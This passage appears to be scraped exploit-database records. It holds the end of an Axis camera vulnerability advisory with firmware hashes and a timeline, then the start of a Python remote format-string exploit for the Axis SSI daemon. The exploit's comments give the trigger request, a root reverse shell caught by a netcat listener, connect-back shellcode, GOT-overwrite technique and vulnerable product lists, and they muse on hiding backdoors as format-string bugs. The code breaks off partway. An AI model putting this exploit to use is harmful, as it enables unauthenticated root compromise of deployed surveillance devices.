The script can be found on directory:\r\n\"{HTMLROOT}/bin/devtools.sh\".\r\n \r\n========================================================================\r\nPRODUCT FIRMWARE FIRMWARE HASH\r\n========================================================================\r\nAXIS A8004-VE 5.85.1.1 e666578d7fca54a7db0917839187cd1a\r\nAXIS A8004-VE 5.85.1 50f114d1169f6fe8dbdadd89ad2e087d\r\nAXIS F34 5.85.3 7a6ed55038edd8a2fc0f676fb8a04b10\r\nAXIS F41 5.85.3 8a089a51a0ecd63543c7883c76db7921\r\nAXIS F44 5.85.3 9e3b05625cfe6580ca3e41c5415090e7\r\nAXIS M1013 5.50.5.4 231cdd7ba84a383ba7f2237612b1cc12\r\nAXIS M1014 5.50.5.4 231cdd7ba84a383ba7f2237612b1cc12\r\nAXIS M1025 5.50.5.4 90d59c56171402828fceb7d25b18be2e\r\nAXIS M1033-W 5.50.5.4 7b96dd594f84fc8c3a4a3ab650434841\r\nAXIS M1034-W 5.50.5.4 7b96dd594f84fc8c3a4a3ab650434841\r\nAXIS M1054 5.50.3.4 39e279aa2c462e9ec01c7b90f698f76a\r\nAXIS M1103 5.50.3 c10243b05fe30655ded7a12b998dbf5e\r\nAXIS M1104 5.50.3 c10243b05fe30655ded7a12b998dbf5e\r\nAXIS M1113 5.50.3 c10243b05fe30655ded7a12b998dbf5e\r\nAXIS M1114 5.50.3 c10243b05fe30655ded7a12b998dbf5e\r\nAXIS M1124 5.75.3.3 f53e0ada9f2e54d2717bf8ad1c7a5928\r\nAXIS M1125 5.75.3.3 f53e0ada9f2e54d2717bf8ad1c7a5928\r\nAXIS M1143-L 5.60.1.5 367aab0673fc1dec0b972fd80a62e75b\r\nAXIS M1144-L 5.60.1.5 367aab0673fc1dec0b972fd80a62e75b\r\nAXIS M1145 5.90.1 ece8f4ccd9d24a01d382798cb7e4a7c7\r\nAXIS M1145-L 5.90.1 ece8f4ccd9d24a01d382798cb7e4a7c7\r\nAXIS M2014 5.50.6 3ffe1a771565b61567f917621c737866\r\nAXIS M3004 5.50.5.4 d65545ef6c03b33b20bf1a04e8216a65\r\nAXIS M3005 5.50.5.4 b461fb6e6aab990d3650b48708cee811\r\nAXIS M3006 5.70.1.2 b2864dcf48ac83053ba4516a2bda535e\r\nAXIS M3007 5.75.1.1 a0cc2e9a6ddad758b16f7de518080f70\r\nAXIS M3014 5.40.9.5 01d8917c9e60dde7741c4a317044b2f7\r\nAXIS M3024-LVE 5.50.5.4 0b91bb66d37e208e130c7eb25099817b\r\nAXIS M3025-VE 5.50.5.4 751f776668d340edf4149dc116ce26c6\r\nAXIS M3026 5.70.1.2 3e78ce4badf994f6d10c5916b6d5513d\r\nAXIS M3027 5.75.1.1 
6d377ea9ea99068e910b416ccc73d8ca\r\nAXIS M3037 5.75.1.1 ef69c662079018e19e988663ad1fc509\r\nAXIS M3113-R 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d\r\nAXIS M3113-VE 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d\r\nAXIS M3114-R 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d\r\nAXIS M3114-VE 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d\r\nAXIS M3203 5.50.3.1 7da467702db8b0e57ea5d237bd10ab61\r\nAXIS M3204 5.50.3.1 7da467702db8b0e57ea5d237bd10ab61\r\nAXIS M5013 5.50.3.1 9183b9ac91c3c03522f37fce1e6c2205\r\nAXIS M5014 5.50.3.1 9183b9ac91c3c03522f37fce1e6c2205\r\nAXIS M7010 5.50.4.1 84f618087151b0cc46398a6e0c6ebc0d\r\nAXIS M7011 5.90.1 362658a55d4f2043ed435c72588bd7e7\r\nAXIS M7014 5.50.4.1 84f618087151b0cc46398a6e0c6ebc0d\r\nAXIS M7016 5.51.2.3 b3de957bbca166f145969a6884050979\r\nAXIS P1204 5.50.6 3ffe1a771565b61567f917621c737866\r\nAXIS P1214 5.50.6 3ffe1a771565b61567f917621c737866\r\nAXIS P1224 5.50.6 3ffe1a771565b61567f917621c737866\r\nAXIS P1343 5.40.9.8 9bbd08a92881b1b07e9f497a436b6a60\r\nAXIS P1344 5.40.9.8 9bbd08a92881b1b07e9f497a436b6a60\r\nAXIS P1346 5.40.9.6 c89ee1e7c54b4728612277e18be1c939\r\nAXIS P1347 5.40.9.6 f0f95768e367c3a2a8999a0bd8902969\r\nAXIS P1353 5.60.1.5 0f59d0e34301519908754af850fdfebb\r\nAXIS P1354 5.90.1 120c230067b7e000fa31af674f207f03\r\nAXIS P1355 5.60.1.5 5dbec1d7b8b6f337581da6ec668a9aad\r\nAXIS P1357 5.90.1 d83472c4d545763e5b05cd6d0c63430f\r\nAXIS P1364 5.85.4 2db00322be0b8c939c89fe4f3e0fd67d\r\nAXIS P1365 5.75.3.2 1eba3426b2046e696d80ea253fe5e9b6\r\nAXIS P1405 5.80.1.1 4db97061feb3cf91eb0cded516f9c5af\r\nAXIS P1425 5.80.1.1 e9213ed81dc68f07c854a990889995ba\r\nAXIS P1427 5.80.1.1 dfe4cd28b929e78d42e8fc8c98616a7c\r\nAXIS P1428-E 5.80.1.1 7a65a0b0e4050824de0d46a1725ad0ea\r\nAXIS P1435 5.85.4.1 219467e77dcb3195d7203a79ecd30474\r\nAXIS P3214 6.10.1 00fca61c0a97dfc5e670a308cbda14d4\r\nAXIS P3215 6.10.1 00fca61c0a97dfc5e670a308cbda14d4\r\nAXIS P3224 6.10.1.1 5fae8852b7790cf6f66bb2356c60acd6\r\nAXIS P3225 6.10.1.1 5fae8852b7790cf6f66bb2356c60acd6\r\nAXIS 
P3301 5.40.9.4 27b7a421f7e3511f3a4b960c80b42c56\r\nAXIS P3304 5.40.9.4 df9e2159c4eadf5e955863c7c5691b1a\r\nAXIS P3343 5.40.9.8 dd752099f8b2c48b91914ec32484f532\r\nAXIS P3344 5.40.9.8 dd752099f8b2c48b91914ec32484f532\r\nAXIS P3346 5.50.3.1 d30498356187ba44f94f31398b04a476\r\nAXIS P3353 5.60.1.4 fa4924480563924a0365268f8eef8864\r\nAXIS P3354 6.10.1 d2f317d88dea1f001ce8151106e0322b\r\nAXIS P3363 5.60.1.5 4b3175a30893a270e5dca8fc405b5d7e\r\nAXIS P3364 6.10.1 6128c6ba026a68a5759b08971504807e\r\nAXIS P3365 6.10.1 f26b0616c595622abb17ce4411dee2b2\r\nAXIS P3367 6.10.1 8dad67aae2ffaee6fb147d6942476f00\r\nAXIS P3384 6.10.1 138ff1bdc97d025f8f31a55e408e2a1d\r\nAXIS P3904-R 5.80.1 0b420fa6e8b768cafd6fa6b5920883be\r\nAXIS P3905-R 5.80.1 0b420fa6e8b768cafd6fa6b5920883be\r\nAXIS P3915-R 5.80.1 1dcf4a39c7e7349629ade723f563e892\r\nAXIS P5414-E 5.90.1 f5782c5dbe8dcffd7863b248a55682ee\r\nAXIS P5415-E 5.90.1 f5782c5dbe8dcffd7863b248a55682ee\r\nAXIS P5512 95.50.4.2 a2d5aab90d51af80d924bb3cc8b249fc\r\nAXIS P5512-E 5.50.4.2 4fd5d721e27fe0f4db7d652bd1730749\r\nAXIS P5514-E 5.85.3 b1fc3d26f6293b94f042ac6ea3aa8271\r\nAXIS P5515 5.85.3 99b2512b57ed8a12c6ad2e53adc8acf8\r\nAXIS P5515-E 5.85.3 639388e504a0841cad2eee7374476727\r\nAXIS P5522 5.50.4.3 8335552031bc297ce87666542f0e3106\r\nAXIS P5522-E 5.50.4.2 218e1b6997f0e5338f86f0ed1b12f8a0\r\nAXIS P5532 5.41.3.1 b1ab3dd8ed126dd68b4793dec9bf3698\r\nAXIS P5532-E 5.41.3.1 f6322413687d169dce61459d8338a611\r\nAXIS P5534 5.40.9.5 3b94922050bec9bc436dce3fcd9bcfaf\r\nAXIS P5534-E 5.40.9.6 a931bc58ee0e882b359dbecd3d699c52\r\nAXIS P5544 5.41.2.2 cb5bcec36f839914db93eaf17ae83e5e\r\nAXIS P5624-E 5.75.1.1 b93952a6083aa628026f145a1dffa313\r\nAXIS P5635-E 5.75.1.1 24d32e4fab54f16b5698ff4e477fc188\r\nAXIS P7210 5.50.4.1 b0e19f8837754ac73aa146b5710a12b1\r\nAXIS P7214 5.50.4.1 b0e19f8837754ac73aa146b5710a12b1\r\nAXIS P7216 5.51.2.1 a77e96832f7d87970bf286288ce2ca81\r\nAXIS P7224 5.51.2.1 5d5ecf065f456e66eb42d9360d22f863\r\nAXIS P8514 5.40.9.4 
8d3eac43ad5c23626b75d5d7c928e29d\r\nAXIS Q1615 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44\r\nAXIS Q1635 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44\r\nAXIS Q1635-E 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44\r\nAXIS Q1755 5.50.4.1 6ca8597f48ed122ce84c2172c079cdf9\r\nAXIS Q1765-LE 5.90.1.1 7930bf5c4c947f2f948f8b7475f01409\r\nAXIS Q1765-LE-PT 5.90.1.1 890ba75a8108d97f2ef1a4aecedf76b1\r\nAXIS Q1775 5.85.3 f47bc9d46a913561e42b999cc6697a83\r\nAXIS Q1910 5.50.4.1 71525d4d56d781318b64e8200806dcf0\r\nAXIS Q1921 5.50.4.1 82f956fec96a9068941e24e12045cefd\r\nAXIS Q1922 5.50.4.1 111a1a4f823e7281af1c872ba52f73c4\r\nAXIS Q1931-E 5.75.1.3 5cf13a2c3d65644c3376ec6466dd9b49\r\nAXIS Q1931-E-PT-Mount5.75.1.1 3ba7e187dc25e98ab73aef262b68e1b9\r\nAXIS Q1932-E 5.75.1.2 b8efe54fc3eca7f2a59322779e63e8e1\r\nAXIS Q1932-E PT.Mount5.75.1 513fc031f85542548eeccfeaa7c1a29e\r\nAXIS Q2901-E 5.55.4.1 d2945717297edab3326179541cfa0688\r\nAXIS Q2901-E PT.Mount5.55.4.1 a41aed45359f11d2ec248419c124a52d\r\nAXIS Q3505 5.80.1.4 9394b3577bdb17cb9f74e56433a0e660\r\nAXIS Q3709-PVE 5.75.1.1 e9fb87337c0a24139a40459336f0bcb3\r\nAXIS Q6000-E 5.65.1.1 b97df19057db1134a43c26f5ddf484de\r\nAXIS Q6032 5.41.1.2 8caad5cd7beeebaf5b05b011b8a1e104\r\nAXIS Q6032-C 5.41.3 58213a4b1c7a980dcb3b54bbee657506\r\nAXIS Q6032-E 5.41.1.4 b4aa977b254694b5d14d7e87e5652a6b\r\nAXIS Q6034 5.41.1.1 4f44a8661534bac08a50651ee90a7d47\r\nAXIS Q6034-C 5.41.3 25d455dc2e2d11639f29b0b381ddd7cb\r\nAXIS Q6034-E 5.41.1.2 3bfab61354170e42ce27fc2477d57026\r\nAXIS Q6035 5.41.1.2 9d124d096bf48fbfd2e11c34de3c880d\r\nAXIS Q6035-C 5.41.3 42d23ae4d0b1456cc54e54734a586d53\r\nAXIS Q6035-E 5.41.1.5 e2123a9e37fda4044847c810b7f25253\r\nAXIS Q6042 5.70.1.1 4f253ed4bb0efaa4a845e0e9bd666766\r\nAXIS Q6042-C 5.70.1.1 21bd154f706091b348c33dd9564438da\r\nAXIS Q6042-E 5.70.1.2 9d5dc03268638498d0299bf466fa0501\r\nAXIS Q6042-S 5.70.1.1 085fc5903d99899d78b48abb9cafdecd\r\nAXIS Q6044 5.70.1.1 29e4cdb9ba2f18953512c5d1e17229c1\r\nAXIS Q6044-C 5.70.1.1 
dc3fc472b88e07278e6ff82eaee71a8d\r\nAXIS Q6044-E 5.70.1.2 83d1e6c1fe5aa9c26710eed03721f928\r\nAXIS Q6044-S 5.70.1.1 654ffd048fdb41ae3c86da4f41e2a31d\r\nAXIS Q6045 5.70.1.1 2db9b247729e9487f476a35a6dd456ce\r\nAXIS Q6045-C 5.70.1.1 9bb561126e2b4f69ac526cfccdf254f6\r\nAXIS Q6045-C-MkII 5.70.1.1 2c9efccb0fba0e63fc4fff73e6ba0fea\r\nAXIS Q6045-E 5.70.1.2 321a5d906863787fdc5e34483e6ec2a8\r\nAXIS Q6045-E-MkII 5.70.1.2 d9d4242a83b1ed225dd3c20530da034d\r\nAXIS Q6045-MkII 5.70.1.1 686f0fe8727e2a726091c9ddf3827741\r\nAXIS Q6045-S 5.70.1.1 43473e42f360efb4ea6f84da35fd9746\r\nAXIS Q6045-S-Mk-II 5.70.1.1 d747a5a3d69264af8448f72822e8d60b\r\nAXIS Q6114-E 5.65.2.1 8cb9a3a88c79ebb2cf5def3cda0da148\r\nAXIS Q6115-E 5.65.2.1 7d2dd3410ce505cd04a1c182917523a5\r\nAXIS Q6128-E 5.85.2.1 49508ff56508f809a75d367896e8d56f\r\nAXIS Q7401 5.50.4 99855c6c9777fdd5fc5e58349ae861a5\r\nAXIS Q7404 5.50.4.2 ffdbee7c9daad303e89a432ba9c4711d\r\nAXIS Q7404 5.50.4 6e31e9709cf9717968c244267aa8c6d0\r\nAXIS Q7406 5.51.2 3cdb7935278157b9c91c334613012b1e\r\nAXIS Q7411 5.90.1 26893adedcfc1953829084e8e7c3fbdd\r\nAXIS Q7414 5.51.2 8ff659a8db077b545205f56dfef217d4\r\nAXIS Q7424-R 5.50.4 d570ef1886c84ab53934fc51385e8aa7\r\nAXIS Q7424-R-MkII 5.51.3 964a13f6b1aef17562cbbde11d936dee\r\nAXIS Q7436 5.90.1 8fe1ef95b231bf6f771c3edc0fbc8afd\r\nAXIS Q8414-LVS 6.10.1 9529cd9cf3b3bd66bec22c0b1c7448cd\r\nAXIS Q8631-E 5.75.1 c7f882afc268ca3d60d07d5770db6a51\r\nAXIS Q8632-E 5.75.1 f01d9a86d21335fe3d78e634858b9e77\r\nAXIS Q8665-LE 5.90.1.1 1549b56d34250a93bbcf7b24b4f63699\r\nAXIS V5915 5.75.1.1 a1c39a9cd545091825001a831d0c1ea4\r\n \r\n \r\nVendor Information, Solutions and Workarounds\r\n+++++++++++++++++++++++++++++++++++++++++++++\r\nAccording to the Vendor, tickets was opened to correct this issue.\r\n \r\nCredits\r\n+++++++\r\nThese vulnerabilities has been discovered and published by Orwelllabs.\r\n \r\n \r\nTimeline\r\n++++++++\r\n2015-09-10: First attempt to contact Vendor\r\n2015-10-30: Vulnerability was reported to 
CERT\r\n2015-11-30: CVE-IDs are assigned\r\n2016-07-25: Since the first vulnerability was published (09.04.2016 -\r\nEDB-ID: 39683)\r\na long conversation revolved around these vulnerabilities with the\r\nmanufacturer.\r\nWe maintained communication since 15/04/2016 until now.\r\nAs there is still disagreement regarding vulnerabilities (and botnets in\r\nthe wild: https://goo.gl/k79I8u),\r\nwe thought it good to publish this advisory, since it has already exhausted\r\nall deadlines.\r\n \r\n \r\nLegal Notices\r\n+++++++++++++\r\nThe information contained within this advisory is supplied \"as-is\" with no\r\nwarranties or guarantees of fitness of use or otherwise. We accept no\r\nresponsibility for any damage caused by the use or misuse of this\r\ninformation.\r\n \r\n \r\nAbout Orwelllabs\r\n++++++++++++++++\r\n# Loadind k4fK43sQu3 m0dule...\n\n# 0day.today [2018-04-03] #", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25204"}, {"lastseen": "2018-03-17T03:12:47", "edition": 2, "description": "Exploit for multiple platform in category remote exploits", "published": "2016-07-19T00:00:00", "type": "zdt", "title": "Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String", "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-07-19T00:00:00", "id": "1337DAY-ID-25439", "href": "https://0day.today/exploit/description/25439", "sourceData": "#!/usr/bin/env python2.7\r\n# \r\n# [SOF]\r\n#\r\n# [Remote Format String Exploit] Axis Communications MPQT/PACS Server Side Include (SSI) Daemon\r\n# Research and development by bashis <mcw noemail eu> 2016\r\n#\r\n# This format string vulnerability has following characteristic:\r\n# - Heap Based (Exploiting string located on the heap)\r\n# - Blind Attack (No output the remote attacker)(*)\r\n# - Remotly exploitable (As anonymous, no credentials needed)\r\n#\r\n# (*) Not so 'Blind' after 
all, since the needed addresses can be predicted by statistic.\r\n#\r\n# This exploit has following characteristic:\r\n# - Multiple architecture exploit (MIPS/CRISv32/ARM) [From version 5.20.x]\r\n# - Modifying LHOST/LPORT in shellcode on the fly\r\n# - Manual exploiting of remote targets\r\n# - Simple HTTPS support\r\n# - Basic Authorization support (not needed for this exploit)\r\n# - FMS dictionary and predicted addresses for GOT free() / BSS / Netcat shellcode\r\n# - Multiple shellcodes (ARM, CRISv32, MIPS and Netcat PIPE shell)\r\n# - Exploiting with MIPS, CRISv32 and ARM shellcode will give shell as root\r\n# - Exploiting with ARM Netcat PIPE shell give normally shell as Anonymous (5.2x and 5.4x give shell as root)\r\n# - Multiple FMS exploit techniques\r\n# - \"One-Write-Where-And-What\" for MIPS and CRISv32\r\n# Using \"Old Style\" POP's\r\n# Classic exploit using: Count to free() GOT, write shellcode address, jump to shellcode on free() call\r\n# Shellcode loaded in memory by sending shellcode URL encoded, that SSI daemon decodes and keeps in memory.\r\n# - \"Two-Write-Where-And-What\" for ARM\r\n# 1) \"Old Style\": Writing 1x LSB and 1x MSB by using offsets for GOT free() target address\r\n# 2) \"New Style\": ARM Arch's have both \"Old Style\" (>5.50.x) )POPs and \"New Style\" (<5.40.x) direct parameter access for POP/Write\r\n# [Big differnce in possibilities between \"Old Style\" and \"New Style\", pretty interesting actually]\r\n# - Another way to POP with \"Old Style\", to be able POPing with low as 1 byte (One byte with %1c instead of eight with %8x)\r\n# - Exploit is quite well documented\r\n#\r\n# Anyhow,\r\n# Everything started from this simple remote request:\r\n#\r\n# ---\r\n# $ echo -en \"GET /httpDisabled.shtml?&http_user=%p|%p HTTP/1.0\\n\\n\" | netcat 192.168.0.90 80\r\n# HTTP/1.1 500 Server Error\r\n# Content-Type: text/html; charset=ISO-8859-1\r\n#\r\n# <HTML><HEAD><TITLE>500 Server Error</TITLE></HEAD>\r\n# <BODY><H1>500 Server 
Error</H1>\r\n# The server encountered an internal error and could not complete your request.\r\n# </BODY></HTML>\r\n# ---\r\n#\r\n# Which gave this output in /var/log/messages on the remote device:\r\n#\r\n# ---\r\n# <CRITICAL> Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:635: getpwnam() failed for user: 0x961f0|0x3ac04b10\r\n# <CRITICAL> Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:303: Failed to get authorization data.\r\n# ---\r\n#\r\n# Which resulted into an remote exploit for more than 200 unique Axis Communication MPQT/PACS products\r\n#\r\n# ---\r\n# $ netcat -vvlp 31337\r\n# listening on [any] 31337 ...\r\n# 192.168.0.90: inverse host lookup failed: Unknown host\r\n# connect to [192.168.0.1] from (UNKNOWN) [192.168.0.90] 55738\r\n# id\r\n# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel),51(viewer),52(operator),53(admin),54(system),55(ptz)\r\n# pwd\r\n# /usr/html\r\n# ---\r\n#\r\n# Some technical notes:\r\n#\r\n# 1. Direct addressing with %<argument>$%n is \"delayed\", and comes in force only after disconnect.\r\n# Old metod with POP's coming into force instantly\r\n#\r\n# 2. Argument \"0\" will be assigned (after using old POP metod and %n WRITE) the next address on stack after POP's)\r\n# - Would be interesting to investigate why.\r\n#\r\n# 3. Normal Apache badbytes: 0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x20, 0x23, 0x26\r\n# Goodbytes: 0x01-0x08, 0x0e-0x1f, 0x21-0x22, 0x24-0x25, 0x27-0xff\r\n#\r\n# 3.1 Normal Boa badbytes: 0x00-0x08, 0x0b-0x0c, 0x0e-0x19, 0x80-0xff\r\n# Goodbytes: 0x09, 0x0a, 0x0d, 0x20-0x7f\r\n#\r\n# 3.2 Apache and Boa, by using URL encoded shellcode as in this exploit:\r\n# Badbytes = None, Goodbytes = 0x00 - 0xff (Yay!)\r\n#\r\n# 4. Everything is randomized, except heap.\r\n#\r\n# 5. 
My initial attempts to use ROP's was not good, as I didn't want to create\r\n# one unique FMS key by testing each single firmware version, and using ROP with FMS\r\n# on heap seems pretty complicated as there is one jump availible, maximum two.\r\n#\r\n# 5.1 Classic GOT write for free() that will jump to shellcode, was the best technique in this case.\r\n# \r\n# 6. Encoded and Decoded shellcode located in .bss section.\r\n# 6.1 FMS excecuted on heap\r\n#\r\n# 7. Vulnerable MPQT/PACS architectures: CRISv32, MIPS and ARM\r\n# 7.1 ARM has nonexecutable stack flag bit set (>5.20.x) by default on their binaries/libs,\r\n# so execute shellcode on heap/stack may be impossible.\r\n# 7.2 ARM shellcode and exploit has been verified by setting executable stack flag bit on binaries,\r\n# and re-compile of the image.\r\n# 7.3 However, ARM is easily exploitable with netcat shell, that's using the builtin '/bin/sh -c' code to execute.\r\n#\r\n# 8. This exploit are pretty well documented, more details can be extracted by reading\r\n# the code and comments.\r\n#\r\n# MIPS ssid maps\r\n# 00400000-0040d000 r-xp 00000000 00:01 2272 /bin/ssid\r\n# 0041d000-0041e000 rw-p 0000d000 00:01 2272 /bin/ssid\r\n# 0041e000-00445000 rwxp 00000000 00:00 0 [heap]\r\n#\r\n# ARM ssid maps\r\n# 00008000-00014000 r-xp 00000000 00:01 2055 /bin/ssid\r\n# 0001c000-0001d000 rw-p 0000c000 00:01 2055 /bin/ssid\r\n# 0001d000-00044000 rw-p 00000000 00:00 0 [heap]\r\n#\r\n# Crisv32 ssid maps\r\n# 00080000-0008c000 r-xp 00000000 1f:03 115 /bin/ssid\r\n# 0008c000-0008e000 rw-p 0000a000 1f:03 115 /bin/ssid\r\n# 0008e000-000b6000 rwxp 0008e000 00:00 0 [heap]\r\n#\r\n# General notes:\r\n#\r\n# When the vul daemon process is exploited, and after popping root connect-back shell,\r\n# the main process are usally restarted by respawnd, after the shell have spawned and taken over the parent process,\r\n# when the main process are fully alive again, I can enjoy the shell, and everybody else can\r\n# enjoy of the camera - 
that should make all of us happy ;)\r\n# During exploiting, logs says almost nothing, only that the main process restarted.\r\n# Note: Not true with ARM Netcat PIPE shell (as the code will vfork() and wait until child exits)\r\n#\r\n# '&http_user=' is the vuln tag, and the FMS will be excecuted when it will try to do vsyslog(),\r\n# after ssid cannot verify the user, free() are the closest function to be called after\r\n# vsyslog(), needed and perfect to use for jumping.\r\n# There is nothing shown for remote user, possible output of FMS are _only_ shown in log/console.\r\n# So we are pretty blind, but due to fixed FMS keys, that doesn't matter for us - it's predictable by statistics.\r\n#\r\n# Quite surprised to see so many different devices and under one major release version,\r\n# that's covered by one \"FMS key\". The \"FMS key\" are valid for all minor versions under the major version.\r\n#\r\n# This made me start thinking how brilliant and clever it would be to make an sophisticated door that's using format string as backdoor, \r\n# which generates no FMS output whatsoever to attacker and unlocked by a 'FMS key', instead of using hardcoded login/password. \r\n#\r\n# - No hardcoded login/password that could easily be found in firmware/software files. \r\n# - Extremely hard to find without local access (and find out what to trigger for opening the door)\r\n# - Nobody can not actually prove it is a sophisticated door for sure. \"It's just another bug.. sorry! 
- here is the fixed version.\"\r\n# (Only to close this door, and open another door, somewhere else, in any binary - and try make it harder to find)\r\n#\r\n# Note:\r\n# I don't say that Axis Communication has made this hidden format string by this purpose.\r\n# I can only believe it was a really stupid mistake from Axis side, after I have seen one screen-dump of the CVS changelog of SSI Daemon, \r\n# and another screen-dump with the change made late 2009, from non-vulnerable to vulnerable, in the affected code of logerr().\r\n#\r\n# Vulnerable and exploitable products\r\n#\r\n# A1001, A8004-VE, A9188, C3003, F34, F41, F44, M1124, M1124-E, M1125, M1125-E, M1145, M1145-L, M3006,\r\n# M3007, M3026, M3027, M3037, M7010, M7011, M7014, M7016, P1125, P1353, P1354, P1355, P1357, P1364,\r\n# P1365, P1405, P1405-E, P1405-LE, P1425-E, P1425-LE, P1427, P1427-E, P1435, P3214, P3214-V, P3215,\r\n# P3215-V, P3224, P3224-LVE, P3225-LV, P3353, P3354, P3363, P3364, P3364-L, P3365, P3367, P3384,\r\n# P3707-PE, P3904, P3904-R, P3905, P3915-R, P5414-E, P5415-E, P5514, P5514-E, P5515, P5515-E, P5624,\r\n# P5624-E, P5635-E, P7210, P7214, P7216, P7224, P8535, Q1602, Q1604, Q1614, Q1615, Q1635, Q1635-E,\r\n# Q1765-LE, Q1765-LE-PT, Q1775, Q1931-E, Q1931-E-PT, Q1932-E, Q1932-E-PT, Q1941-E, Q2901-E, Q2901-E-PT,\r\n# Q3504, Q3505, Q6000-E, Q6042, Q6042-C, Q6042-E, Q6042-S, Q6044, Q6044-C, Q6044-E, Q6044-S, Q6045,\r\n# Q6045-C, Q6045-E, Q6045-S, Q6114-E, Q6115-E, Q7411, Q7424-R, Q7436, Q8414, Q8414-LVS, Q8631-E, Q8632-E,\r\n# Q8665-E, Q8665-LE, V5914, V5915, M1054, M1103, M1104, M1113, M1114, M2014-E, M3014, M3113, M3114, M3203,\r\n# M3204, M5013, M5014, M7001, P12/M20, P1204, P1214, P1214-E, P1224-E, P1343, P1344, P1346, P1347, P2014-E,\r\n# P3301, P3304, P3343, P3344, P3346, P3346-E, P5512, P5512-E, P5522, P5522-E, P5532, P5532-E, P5534, P5534-E,\r\n# P5544, P8221, P8513, P8514, P8524, Q1755, Q1910, Q1921, Q1922, Q6032, Q6032-C, Q6032-E, Q6034, Q6034-C,\r\n# Q6034-E, Q6035, Q6035-C, Q6035-E, 
Q7401, Q7404, Q7406, Q7414, Q8721-E, Q8722-E, C, M1004-W, M1011, M1011-W,\r\n# M1013, M1014, M1025, M1031-W, M1033-W, M1034-W, M1143-L, M1144-L, M3004, M3005, M3011, M3024, M3024-L,\r\n# M3025, M3044-V, M3045-V, M3046-V, P1311, P1428-E, P7701, Q3709-PVE, Q3708-PVE, Q6128-E... and more\r\n#\r\n# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt\r\n#\r\n# Firmware versions vulnerable to the SSI FMS exploit\r\n#\r\n# ('V.Vx' == The FMS key used in this exploit)\r\n#\r\n# Firmware Introduced CRISv32 MIPS ARM (no exec heap from >5.20.x)\r\n# 5.00.x 2008 - - no\r\n# 5.01.x 2008 no - no\r\n# 5.02.x 2008 no - -\r\n# 5.05.x 2009 no - -\r\n# 5.06.x 2009 no - -\r\n# 5.07.x 2009 no - no\r\n# 5.08.x 2010 no - -\r\n# 5.09.x 2010 no - -\r\n# 5.10.x 2009 no - -\r\n# 5.11.x 2010 no - -\r\n# 5.12.x 2010 no - -\r\n# 5.15.x 2010 no - -\r\n# 5.16.x 2010 no - -\r\n# 5.20.x 2010-2011 5.2x - 5.2x\r\n# 5.21.x 2011 5.2x - 5.2x\r\n# 5.22.x 2011 5.2x - -\r\n# 5.25.x 2011 5.2x - -\r\n# 5.40.x 2011 5.4x 5.4x 5.4x\r\n# 5.41.x 2012 5.4x - -\r\n# 5.50.x 2013 5.5x 5.5x 5.4x\r\n# 5.51.x 2013 - 5.4x -\r\n# 5.55.x 2013 - 5.5x 5.5x\r\n# 5.60.x 2014 - 5.6x 5.6x\r\n# 5.65.x 2014-2015 - 5.6x -\r\n# 5.70.x 2015 - 5.7x -\r\n# 5.75.x 2015 - 5.7x 5.7x\r\n# 5.80.x 2015 - 5.8x 5.8x\r\n# 5.81.x 2015 - 5.8x -\r\n# 5.85.x 2015 - 5.8x 5.8x\r\n# 5.90.x 2015 - 5.9x -\r\n# 5.95.x 2016 - 5.9x 5.8x\r\n# 6.10.x 2016 - 6.1x -\r\n# 6.15.x 2016 - - 6.1x\r\n# 6.20.x 2016 - 6.2x -\r\n#\r\n# Vendor URL's of still supported and affected products\r\n#\r\n# http://www.axis.com/global/en/products/access-control\r\n# http://www.axis.com/global/en/products/video-encoders\r\n# http://www.axis.com/global/en/products/network-cameras\r\n# http://www.axis.com/global/en/products/audio\r\n#\r\n# Axis Product Security\r\n#\r\n# [email\u00a0protected]\r\n# http://www.axis.com/global/en/support/product-security\r\n# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt\r\n# 
http://www.axis.com/global/en/support/faq/FAQ116268\r\n#\r\n# Timetable\r\n#\r\n# - Research and Development: 06/01/2016 - 01/06/2016\r\n# - Sent vulnerability details to vendor: 05/06/2016\r\n# - Vendor responce received: 06/06/2016\r\n# - Vendor ACK of findings received: 07/06/2016\r\n# - Vendor sent verification image: 13/06/2016\r\n# - Confirmed that exploit do not work after vendors correction: 13/06/2016\r\n# - Vendor informed about their service release(s): 29/06/2016\r\n# - Sent vendor a copy of the (this) PoC exploit: 29/06/2016\r\n# - Full Disclosure: 18/07/2016\r\n#\r\n# Quote of the day: Never say \"whoops! :o\", always say \"Ah, still interesting! :>\"\r\n#\r\n# Have a nice day\r\n# /bashis\r\n#\r\n#####################################################################################\r\n \r\nimport sys\r\nimport string\r\nimport socket\r\nimport time\r\nimport argparse\r\nimport urllib, urllib2, httplib\r\nimport base64\r\nimport ssl\r\nimport re\r\n \r\n \r\nclass do_FMS:\r\n \r\n# POP = \"%8x\" # Old style POP's with 8 bytes per POP\r\n POP = \"%1c\" # Old style POP's with 1 byte per POP\r\n WRITElln = \"%lln\" # Write 8 bytes\r\n WRITEn = \"%n\" # Write 4 bytes\r\n WRITEhn = \"%hn\" # Write 2 bytes\r\n WRITEhhn = \"%hhn\" # Write 1 byte\r\n \r\n def __init__(self,targetIP,verbose):\r\n self.targetIP = targetIP\r\n self.verbose = verbose\r\n self.fmscode = \"\"\r\n \r\n # Mostly used internally in this function\r\n def Add(self, data):\r\n self.fmscode += data\r\n \r\n # 'New Style' Double word (8 bytes)\r\n def AddDirectParameterLLN(self, ADDR):\r\n self.Add('%')\r\n self.Add(str(ADDR))\r\n self.Add('$lln')\r\n \r\n # 'New Style' Word (4 bytes)\r\n def AddDirectParameterN(self, ADDR):\r\n self.Add('%')\r\n 